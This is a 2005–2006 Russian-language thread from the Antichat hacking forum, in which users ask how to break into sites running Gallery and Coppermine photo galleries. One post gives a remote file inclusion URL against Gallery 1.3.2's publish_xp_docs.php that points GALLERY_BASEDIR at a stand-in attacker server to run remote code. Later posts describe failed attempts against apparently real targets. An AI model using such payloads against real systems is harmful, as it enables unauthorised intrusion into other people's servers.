ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости Gallery v1.4.1
  #1  
Старый 13.07.2005, 17:15
Аватар для Neiropunk
Neiropunk
Новичок
Регистрация: 25.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию Уязвимости Gallery v1.4.1

Может это и не совсем форум, но я даже не знаю к чему это отнести. Прошу рассказать о знаниях по поводу Powered by Gallery v1.4.1. Если есть методы по взлому - прошу поделиться.
 
Ответить с цитированием

  #2  
Старый 13.07.2005, 21:10
Аватар для К.е.Н
К.е.Н
Участник форума
Регистрация: 05.07.2005
Сообщений: 116
Провел на форуме:
177092

Репутация: 6
Отправить сообщение для К.е.Н с помощью ICQ
По умолчанию

Уязвимость обнаружена в 1.3.2. И поэтому тебе это врятли поможет но навсякий случай попробуй.
Gallery – система управления изображениями от http://gallery.sourceforge.net.

Gallery v1.3.2 содержит новую особенность, которая позволяет пользователям публиковать изображения Web сайте, используя систему публикации Windows XP Publishing subsystem. Обнаруженная уязвимость в этой особенности (а точнее в сценарии publish_xp_docs.php) позволяет злонамеренному пользователю обработать URL таким образом, что он может получить удаленный доступ к Web серверу с привилегиями Web сервера.

Пример:

http://hostname/gallery/publish_xp_docs.php?
GALLERY_BASEDIR=http://your.evil.server.tdl/
 
Ответить с цитированием

  #3  
Старый 14.07.2005, 03:46
Аватар для ProTeuS
ProTeuS
HARDstasy
Регистрация: 26.11.2004
Сообщений: 1,367
Провел на форуме:
4226592

Репутация: 2175


Отправить сообщение для ProTeuS с помощью ICQ
По умолчанию

такая тема - какие версии только не пробовал, резальт один:

Fatal error: Call to undefined function: _() in /home/users/gallery/htdocs/publish_xp_docs.php on line 28

это типа пат4енная, или на своей стороне нужно по-особому index.php сосотавить (у меня простой passthru был)???
 
Ответить с цитированием

  #4  
Старый 17.07.2005, 16:32
Аватар для К.е.Н
К.е.Н
Участник форума
Регистрация: 05.07.2005
Сообщений: 116
Провел на форуме:
177092

Репутация: 6
Отправить сообщение для К.е.Н с помощью ICQ
По умолчанию

Это версия более новаю и у нее пока багов не нашли
 
Ответить с цитированием

  #5  
Старый 02.06.2006, 23:47
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Ой блин да простят меня все за то что я такое старьё поднял но у меня тут вопрос ребром встал а баги как таковой не нашол интересует Coppermine Photo Gallery v1.3.2 перерыл всё а толком ничего нету галлерея вроде не патченная но файла publish_xp_docs.php и xp_publish.php нема =(
 
Ответить с цитированием

  #6  
Старый 03.06.2006, 00:41
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

__________________
 
Ответить с цитированием

  #7  
Старый 03.06.2006, 01:14
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Ага не помогает
 
Ответить с цитированием

  #8  
Старый 03.06.2006, 01:29
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Из разрешённых на заливку файлов только формат .jpg остальное всё в топке (запрещено) sql иньекция не катит =(

сплойт себя немного странно повёл но результат 1 файла с которым работает сплойт нет на серваке =(

Также к слову там установленна
Код:
Axis 2120 Network Camera 2.30
но по уязвимости этого вообще нечего не нашол толком =(

Последний раз редактировалось Nova; 03.06.2006 в 01:49.. Причина: Добавил чтоб не флудить =)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости чатов L@nd@R Чаты 4 03.04.2005 05:12
Действующие уязвимости почтовых систем РФ Maxmen E-Mail 16 12.12.2004 16:48
Взлом wmshop Xalegi Уязвимости 0 29.11.2004 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ